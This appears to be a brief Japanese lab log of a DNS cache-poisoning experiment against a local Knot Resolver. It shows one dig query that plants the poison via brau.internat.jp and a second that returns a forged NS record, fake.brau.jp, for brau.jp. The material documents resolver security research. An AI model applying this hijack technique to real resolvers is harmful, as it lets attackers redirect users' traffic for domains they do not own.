1. DNS/KnotResolver/brau.internat.jp/brau.jpを乗取る/第二段/必要なかったケース
2. 毒の仕込み
$dig -t txt brau.internat.jp @127.0.0.1 ; <<>> DiG 9.16.1-Ubuntu <<>> -t txt brau.internat.jp @127.0.0.1 ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 40882 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;brau.internat.jp. IN TXT ;; ANSWER SECTION: brau.internat.jp. 60 IN TXT "brau.internat.jp" ;; Query time: 783 msec ;; SERVER: 127.0.0.1#53(127.0.0.1) ;; WHEN: 日 8月 30 11:21:51 JST 2020 ;; MSG SIZE rcvd: 74
3. 毒入り返答
$ dig -t ns brau.jp @127.0.0.1 ; <<>> DiG 9.16.1-Ubuntu <<>> -t ns brau.jp @127.0.0.1 ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 25784 ;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;brau.jp. IN NS ;; ANSWER SECTION: brau.jp. 300 IN NS fake.brau.jp. ;; Query time: 11 msec ;; SERVER: 127.0.0.1#53(127.0.0.1) ;; WHEN: 日 8月 30 11:22:04 JST 2020 ;; MSG SIZE rcvd: 55